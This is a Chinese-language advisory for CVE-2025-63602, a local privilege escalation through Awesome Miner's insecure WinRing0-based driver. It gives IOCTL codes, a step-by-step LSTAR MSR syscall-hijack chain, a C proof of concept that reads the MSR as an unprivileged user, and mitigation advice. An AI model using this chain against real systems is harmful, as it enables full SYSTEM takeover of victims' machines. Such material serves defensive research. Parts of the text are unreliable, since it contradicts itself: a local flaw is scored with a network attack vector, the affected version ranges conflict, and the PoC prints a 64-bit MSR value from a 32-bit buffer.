CVE-2025-63602: Awesome Miner本地权限提升漏洞

漏洞信息

漏洞编号

CVE-2025-63602

漏洞类型

本地权限提升

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Awesome Miner (IntelliBreeze.Maintenance.Service.sys / WinRing0)

漏洞概述

CVE-2025-63602是Awesome Miner软件中的一个高危本地权限提升漏洞。该漏洞存在于Awesome Miner 11.2.4及之前版本中，由于软件内置的IntelliBreeze.Maintenance.Service.sys驱动程序（基于不安全的WinRing0 1.2.0.5版本）缺乏正确的DACL（Discretionary Access Control List）安全配置，导致未授权的普通用户也能够与该驱动程序进行交互。由于该驱动程序具有直接读写内核内存和MSR（Model Specific Register）寄存器的权限（如LSTAR寄存器），攻击者可以利用这一漏洞实现本地权限提升，从普通用户权限升级到系统管理员权限。此外，该漏洞还可能导致信息泄露、拒绝服务等安全问题。攻击者利用该漏洞可以在目标系统上执行任意代码，完全控制受害计算机。

技术细节

该漏洞的根本原因在于Awesome Miner使用的WinRing0驱动程序版本存在严重的安全设计缺陷。WinRing0是一个常用的驱动程序，旨在为应用程序提供对CPU硬件的底层访问能力，通常用于性能监控和硬件超频等场景。问题在于1.2.0.5版本的WinRing0被重命名为IntelliBreeze.Maintenance.Service.sys后，其DACL配置不正确，允许任何用户级别的进程直接与驱动进行通信而无需管理员权限。该驱动程序提供了IOCTL接口，可以执行特权操作，包括：1）读写任意物理内存地址；2）访问和修改MSR寄存器，特别是LSTAR寄存器（用于设置系统调用入口点）；3）直接与Windows内核进行交互。攻击者可以通过发送特定的IOCTL请求，利用驱动程序的权限执行内核级别的操作，从而实现权限提升。例如，攻击者可以修改LSTAR MSR寄存器，将系统调用处理程序重定向到恶意代码，或者直接修改内核内存中的敏感数据结构。

攻击链分析

STEP 1

步骤1

攻击者获得目标系统的低权限访问（如普通用户账户）

STEP 2

步骤2

攻击者打开与IntelliBreeze.Maintenance.Service.sys驱动的通信句柄（\Device\IntelliBreezeMaintenanceService）

STEP 3

步骤3

通过DeviceIoControl发送特制的IOCTL请求，利用不安全的DACL直接与驱动交互，无需管理员权限

STEP 4

步骤4

利用驱动的IOCTL_READ_MSR和IOCTL_WRITE_MSR功能读取和修改MSR寄存器（如LSTAR系统调用入口点）

STEP 5

步骤5

修改LSTAR MSR寄存器，将系统调用处理程序重定向到攻击者控制的内存区域

STEP 6

步骤6

触发任意系统调用（如NtQuerySystemInformation），使控制流跳转到恶意代码，以内核权限执行

STEP 7

步骤7

成功实现本地权限提升，获得SYSTEM级别权限，可执行任意代码、窃取敏感信息或完全控制系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
CVE-2025-63602 Proof of Concept
Target: Awesome Miner thru 11.2.4 (IntelliBreeze.Maintenance.Service.sys)
Type: Local Privilege Escalation via Insecure WinRing0 Driver
Note: This is a conceptual PoC for educational and security research purposes only.
*/

#include <windows.h>
#include <stdio.h>

#define IOCTL_READ_MSR 0x9C402408
#define IOCTL_WRITE_MSR 0x9C40240C
#define IOCTL_READ_MEM 0x9C402400
#define IOCTL_WRITE_MEM 0x9C402404

// MSR addresses
#define MSR_LSTAR 0xC0000082

int main() {
    HANDLE hDevice;
    DWORD bytesReturned;
    DWORD inputBuffer[2];
    DWORD outputBuffer;
    BOOL result;
    
    printf("[*] CVE-2025-63602 PoC - Awesome Miner LPE\n");
    printf("[*] Opening driver handle...\n");
    
    // Open handle to vulnerable driver
    hDevice = CreateFileA(
        "\\\\.\\IntelliBreezeMaintenanceService",
        GENERIC_READ | GENERIC_WRITE,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        NULL
    );
    
    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("[-] Failed to open driver handle. Error: %d\n", GetLastError());
        return 1;
    }
    
    printf("[+] Driver handle opened successfully\n");
    printf("[*] Reading LSTAR MSR (0xC0000082)...\n");
    
    // Read LSTAR MSR to demonstrate arbitrary MSR access
    inputBuffer[0] = MSR_LSTAR;
    result = DeviceIoControl(
        hDevice,
        IOCTL_READ_MSR,
        inputBuffer,
        sizeof(inputBuffer),
        &outputBuffer,
        sizeof(outputBuffer),
        &bytesReturned,
        NULL
    );
    
    if (result) {
        printf("[+] LSTAR MSR value: 0x%llX\n", outputBuffer);
        printf("[!] Successfully read kernel MSR as unprivileged user!\n");
        printf("[*] This demonstrates the vulnerability - arbitrary MSR access.\n");
        printf("[*] An attacker could write to this MSR to hijack syscalls.\n");
    } else {
        printf("[-] Failed to read MSR. Error: %d\n", GetLastError());
    }
    
    CloseHandle(hDevice);
    return 0;
}

/*
Attack Scenario:
1. Attacker with low-privilege access opens handle to IntelliBreeze.Maintenance.Service.sys
2. Uses IOCTL interface to read/write MSR registers (e.g., LSTAR)
3. Modifies LSTAR to point to malicious code location
4. Triggers a syscall to execute attacker-controlled code in kernel mode
5. Escalates privileges to SYSTEM
*/

影响范围

Awesome Miner < 11.2.4

WinRing0 (IntelliBreeze.Maintenance.Service.sys) < 1.2.0.5

防御指南

临时缓解措施

由于该漏洞存在于系统驱动程序中，临时缓解措施有限。建议：1）确保Awesome Miner软件仅在必要时安装，并限制其使用范围；2）监控系统中IntelliBreeze.Maintenance.Service.sys驱动的加载和访问日志；3）实施最小权限原则，确保普通用户账户无法安装或运行需要高权限的应用；4）考虑使用虚拟化技术隔离受影响的软件运行环境；5）等待官方发布安全更新后立即应用补丁。